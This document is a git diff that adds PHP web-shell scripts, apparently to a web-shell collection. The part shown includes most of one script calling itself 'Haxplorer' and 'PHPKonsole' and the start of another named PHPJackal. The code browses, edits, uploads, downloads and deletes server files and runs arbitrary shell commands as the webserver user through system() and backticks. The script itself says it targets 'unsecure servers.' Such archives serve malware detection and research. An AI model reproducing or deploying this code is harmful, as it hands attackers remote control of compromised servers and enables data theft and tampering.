+			usort($dirn, "mycmp");
+			usort($filen, "mycmp");
+		}
+		else {
+			sort ($dirn);
+	 		sort ($filen);
+	 	}
+	reset ($dirn);
+ 	reset ($filen);
+ 	if (function_exists('array_merge')) {
+		$filelist = array_merge ($dirn, $filen);
+	}
+ 	else {
+		$filelist = $dirn + $filen;
+	}
+
+	
+	if ( count($filelist)-1 > $Pmax ) {
+		$from = $Pidx * $Pmax;
+		$to = ($Pidx + 1) * $Pmax-1;
+		if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+			$to = count($filelist) - 1;
+		if ($to > count($filelist)-1)
+			$to = count($filelist)-1;
+		$Dcontents = array();
+		For ($Fi = $from; $Fi <= $to; $Fi++) {
+			$Dcontents[] = $filelist[$Fi];	
+		}
+
+	}
+	else {
+		$Dcontents = $filelist;
+	}
+	
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+	    reset($tdcolors);
+	    $tdcolor = arrval(each($tdcolors));	  }
+	  	         
+ 		if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+          			/* <!-- Dirname --> */
+			echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+  				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+ 				/* <!-- Rename --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+ 				/* <!-- Delete --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+				/* <!-- End of Actions --> */
+			echo "&nbsp;&nbsp;</center></td>\n";
+  				/* <!-- Size --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+ 			echo "<strong>D</strong>";
+		        if ( @is_readable("$dir/$file") ) {
+   				echo "<strong>R</strong>";
+ 			}
+ 			if (function_exists('is_writeable')) {
+				if ( @is_writeable("$dir/$file") ) {
+ 					echo "<strong>W</stong>";
+ 				}
+			}
+ 			else {
+    				echo "<strong>(W)</stong>";
+  			}
+  			if ( @is_executable("$dir/$file") ) {
+ 				echo "<Strong>X<strong>";
+ 			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+ 				/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+			echo "</tr>\n";
+
+        	}
+  		else { /* <!-- Then it must be a File... --> */
+     				/* <!-- Filename --> */
+			if ( @is_readable("$dir/$file") )
+ 				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+  			else
+  				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+  			   				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+ 				/* <!-- Rename --> */
+			echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+  				/* <!-- Edit --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 				echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+   				/* <!-- Copy --> */
+ 			echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+  				/* <!-- Move --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 					echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+    				/* <!-- Delete --> */
+			echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+ 				/* <!-- Download --> */
+			echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+ 				/* <!-- Execute --> */
+			if ( @is_executable("$dir/$file") )
+ 				echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+    				/* <!-- End of Actions --> */
+			echo sp(2)."</center></td>\n";
+ 				/* <!-- Size --> */
+			echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+ 			$size = @filesize("$dir/$file");
+ 			If ($size != false) {
+			        $filesizes += $size;
+				echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+			}
+			else
+				echo "&nbsp;&nbsp;<strong>0 B<strong>";
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+ 			if ( @is_readable("$dir/$file") )
+ 				echo "<strong>R</strong>";
+   			if ( @is_writeable("$dir/$file") )
+ 				echo "<strong>W</stong>";
+   			if ( @is_executable("$dir/$file") )
+ 				echo "<Strong>X<strong>";
+   			if (function_exists('is_uploaded_file')){
+ 				if ( @is_uploaded_file("$dir/$file") )
+ 					echo "<Strong>U<strong>";
+ 			}
+ 			else {
+				echo "<Strong>(U)<strong>";
+			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+			 	/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+ 			echo "</tr>\n";
+ 		}
+  	}
+
+    	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+  	echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
+  	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+  	echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+	
+	function printpagelink($a, $b, $link = ""){
+		if ($link != "") 
+			echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+		else
+			echo "<b>| $a - $b |</b>";
+	}
+        
+	if ( count($filelist)-1 > $Pmax ) {
+		echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+		$Fi = 0;
+		while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+			$from = $Fi*$Pmax;
+			while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+			$to = ($Fi + 1) * $Pmax - 1;
+			if ($Fi == $Pidx)
+				$link="";
+			else 
+				$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+			printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+			echo "&nbsp;&nbsp;&nbsp;";
+			$Fi++;
+		}
+		$from = $Fi*$Pmax;
+		while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+		$to = count($filelist)-1;
+		if ($Fi == $Pidx)
+			$link="";
+		else 
+			$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+		printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);		
+		
+	
+		echo "</center></td></tr></table></td></tr>";
+	}
+
+
+    	echo "</table>\n<br><table NOWRAP>";
+
+  	if ($isGoodver) {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+	}
+ 	else {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+	}
+      		/* <!-- Other Actions --> */
+   	echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+  	echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+	                     buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+			     buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+    	echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+  	echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+  	echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
+   	echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
+  	echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
+  	echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
+  	echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+  	echo "</table></td>";
+ 	echo "</table>";
+ 	echo "<br>";
+     	@closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+ 	echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (Mydeldir($file)==false) {
+ 			echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+	}
+ 	else {
+		echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+     	<input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (@unlink($file)==false) {
+ 			echo "Could not remove \"$file\"<br>";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+        }
+ 	else {
+       	echo "Are you sure you want to delete \"$file\" ?
+      	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+       	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+	echo "<center><table><tr><td NOWRAP>";
+ 	$i = 1;
+ 	while (file_exists("$lastdir/newfile$i.txt"))
+ 		$i++;
+ 	$file = fopen("$lastdir/newfile$i.txt", "w+");
+ 	if ($file == false)
+ 		echo "Could not create the new file...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+ 		echo "
+   			<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+			<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+			<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+			<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+			</form></center>
+ 			</td></tr></table></center>   		";
+	}
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	$i = 1;
+ 	while (is_dir("$lastdir/newdir$i"))
+  		$i++;
+ 	$file = mkdir("$lastdir/newdir$i", 0777);
+ 	if ($file == false)
+ 		echo "Could not create the new directory...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+ 	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+		<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+		<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+		<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+		</form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+	$contents = "";
+	$fc = @file( $file );
+  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		$contents .= htmlentities( $line ) ;
+ 	}
+ 	echo "<br><center><table><tr><td NOWRAP>";
+	echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+	echo "<strong>EDIT FILE: </strong>$file<br>\n";
+	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+	echo "<input type=\"submit\" value=\"Save\">";
+	echo "</form>";
+	echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+	$fo = fopen($file, "w");
+	$wrret = fwrite($fo, stripslashes($contents));
+	$clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+	$downloadfile = urldecode($file);
+	if (function_exists("basename"))
+    		$downloadto = basename ($downloadfile);
+	else
+		$downloadto = "download.ext";
+	if (!file_exists("$downloadfile"))
+		echo "The file does not exist";
+	else {
+		$size = @filesize("$downloadfile");
+		if ($size != false) {
+			$add="; size=$size";
+		}			
+		else {
+			$add="";
+		}
+ 		header("Content-Type: application/download");
+		header("Content-Disposition: attachment; filename=$downloadto$add");
+		$fp=fopen("$downloadfile" ,"rb");
+		fpassthru($fp);
+		flush();
+	}
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+   	?>
+	<center>
+	 <table>
+	  <tr>
+	   <td NOWRAP>
+    		Welcome to the upload section...
+ 		Please note that the destination file will be
+		<br> overwritten if it already exists!!!<br><br>
+ 		<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+ 			<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+ 			<input type="hidden" name="cmd" value="uploadproc">
+ 			<input type="hidden" name="dir" value="<?php echo $dir ?>">
+ 			<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+ 			<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+ 			Select local file:<br>
+ 			<input size="75" name="userfile" type="file"><br>
+ 			<input type="submit" value="Send File">
+ 		</form>
+		<br>
+ 		<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+			<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+			<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+			<input tabindex="0" type="submit" value="Cancel">
+		</form>
+	   </td>
+	  </tr>
+	 </table>
+	</center>
+
+ 	<?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+	echo "<center><table><tr><td NOWRAP>";
+	if (file_exists($userfile))
+		$res = copy($userfile, "$dir/$userfile_name");
+	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+     	if ($res) {
+		echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+		echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
+		echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+	}
+	else {
+		echo "Could not move uploaded file; Action aborted...";
+	}
+	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+	echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+	$fc = @file( $file );  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		echo spacetonbsp(@htmlentities($line))."<br>\n";
+  	}
+	echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+     	if (function_exists('is_dir')) {
+ 		if (is_dir("$oldfile")) {
+ 			$objname = "Directory";
+ 			$objident = "Directory";
+  		}
+ 		else {
+ 			$objname = "Filename";
+ 			$objident = "file";
+ 		}
+ 	}
+   	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+	If (empty($newfile) != true) {
+ 		echo "<center>";
+	 	$return = @rename($oldfile, "$olddir$newfile");
+		if ($return) {
+ 			echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+ 		}
+ 		else {
+ 			if ( @file_exists("$olddir$newfile") ) {
+ 				echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+ 			}
+ 			else {
+ 				echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+ 			}
+  		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+ 	}
+ 	else {
+ 		$dpos = strrpos($oldfile, "/");
+ 		if (strval($dpos)!="") {
+ 			$olddir = substr($oldfile, 0, $dpos+1);
+   		}
+ 		else {
+ 			$olddir = "$lastdir/";
+		}
+ 		$fpos = strrpos($oldfile, "/");
+ 		if (strval($fpos)!="") {
+ 			$inputfile = substr($oldfile, $fpos+1);
+   		}
+ 		else {
+	 		$inputfile = "";
+ 		}
+       		echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+ 		echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+ 		echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+ 		echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+ 		echo "Rename \"$oldfile\" to:<br>\n";
+ 		echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+		echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+ 		echo "</td></tr></table></center>";
+ 	}
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>
+<h3>PHPKonsole</h3>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+    if (!empty($HTTP_POST_VARS))
+	extract($HTTP_POST_VARS);
+	  
+    if (!empty($HTTP_GET_VARS))
+	extract($HTTP_GET_VARS);
+	      
+    if (!empty($HTTP_SERVER_VARS))
+	extract($HTTP_SERVER_VARS);
+    }
+		    
+    if (!empty($work_dir)) {
+	if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	        if ($regs[1][0] == '/') {
+	            $new_dir = $regs[1];
+		} else {
+		    $new_dir = $work_dir . '/' . $regs[1];
+		}
+		if (file_exists($new_dir) && is_dir($new_dir)) {
+		    $work_dir = $new_dir;
+		}
+		unset($command);
+	    }
+	}
+    }
+    if (file_exists($work_dir) && is_dir($work_dir)) {
+	chdir($work_dir);
+    }
+    $work_dir = exec('pwd');
+?>
+
+    <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
+	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
+	<input type="hidden" name="cmd" value="con">
+	<?php
+	    $work_dir_splitted = explode('/', substr($work_dir, 1));
+	    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
+	    if (!empty($work_dir_splitted[0])) {
+		$path = '';
+		for ($i = 0; $i < count($work_dir_splitted); $i++) {
+		    $path .= '/' . $work_dir_splitted[$i];
+		    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
+		}
+	    }
+	?></b></td>
+	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
+	
+	<?php
+	$dir_handle = opendir($work_dir);
+	while ($dir = readdir($dir_handle)) {
+	    if (is_dir($dir)) {
+		if ($dir == '.') {
+		    echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+		} elseif ($dir == '..') {
+		    if (strlen($work_dir) == 1) {
+		    }
+		    elseif (strrpos($work_dir, '/') == 0) {
+			echo "<option value=\"/\">Parent Directory</option>\n";
+		    } else {
+			echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+		    }
+		} else {
+		    if ($work_dir == '/') {
+			echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+		    } else {
+			echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+		    }
+		}
+	    }
+	}
+	closedir($dir_handle);
+	?>
+	</select></td></tr></table>
+	<p>Command: <input class="inputtext" type="text" name="command" size="60">
+	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
+	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
+	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
+	    if (!empty($command)) {
+	        echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; 
+		if ($stderr) {
+		    $tmpfile = tempnam('/tmp', 'phpshell');
+		    $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
+		} else if ($command == 'ls') {
+		    $command .= ' -F';
+		}
+		$output = `$command`;
+		echo htmlspecialchars($output);
+	    }
+	?></textarea>
+    </form>
+																													      
+    <script language="JavaScript" type="text/javascript">
+	document.forms[0].command.focus();
+    </script>
+ </td></tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+	$isMainMenu = true;
+     ?>
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="border">
+	   <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+	<br>
+ 	<center>
+	<table border="0" NOWRAP>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   Haxplorer is a server side file browser wich (ab)uses the directory object to list
+ 	   the files and directories stored on a webserver. This handy tools allows you to manage
+ 	   files and directories on a unsecure server with php support.<br><br>This entire script
+ 	   is coded for unsecure servers, if your server is secured the script will hide commands
+ 	   or will even return errors to your browser...<br><br>
+	  </td>
+	 </tr>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+	    When you run commands they will run as the webservers UserID. This should work perfectly
+	    for managing files, like moving, copying etc. If you're using a linux server, system commands
+	    such as ls, mv and cp will be available for you... <br><br>This function will only work if the
+	    server supports php and the execute commands...<br><br>
+	  </td>
+	 </tr>
+        </table>
+	</center>
+	<br>
+     <?php
+}
+
+if ($cmd != "downl") {
+	if ( $isMainMenu != true) {
+ 		?>
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+		 <tr>
+		  <td width="100%" style="class="silver border">
+		   <center><strong>
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con");        ?>&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+ 		   </strong></center>
+		  </td>
+		 </tr>
+		</table>
+		<br>
+		<?php
+}
+	?>
+	<table width=100% border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="silver border">
+	   <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+ 	   </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?>
diff --git a/php/PHPJackal.php b/php/PHPJackal.php
new file mode 100644
index 0000000..87862ba
--- /dev/null
+++ b/php/PHPJackal.php
@@ -0,0 +1,1582 @@
+<?php
+#--Config--#
+$login_password='';
+#----------#
+error_reporting(E_ALL);
+ignore_user_abort(true);
+set_time_limit(0);
+ini_set('max_execution_time','0');
+ini_set('memory_limit','9999M');
+ini_set('output_buffering',0);
+set_magic_quotes_runtime(0);
+if(!isset($_SERVER))$_SERVER=&$HTTP_SERVER_VARS;
+if(!isset($_POST))$_POST=&$HTTP_POST_VARS;
+if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
+if(!isset($_COOKIE))$_COOKIE=&$HTTP_COOKIE_VARS;
+if(!isset($_FILES))$_FILES=&$HTTP_POST_FILES;
+$_REQUEST = array_merge($_GET,$_POST);
+if(get_magic_quotes_gpc()){
+foreach($_REQUEST as $key=>$value)$_REQUEST[$key]=stripslashes($value);
+}
+function hlinK($str=''){
+$myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF'].'?';
+$new=explode('&',$str);
+foreach($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el=explode('=',$m);
+if($el[0]==$key)$add=0;
+}
+if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";}
+}
+$ret.=$str;
+return $ret;
+}
+$et='</td></tr></table>';
+if(!empty($login_password)){
+if(!empty($_REQUEST['fpassw'])){
+if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
+header('Location: '.hlinK());
+}
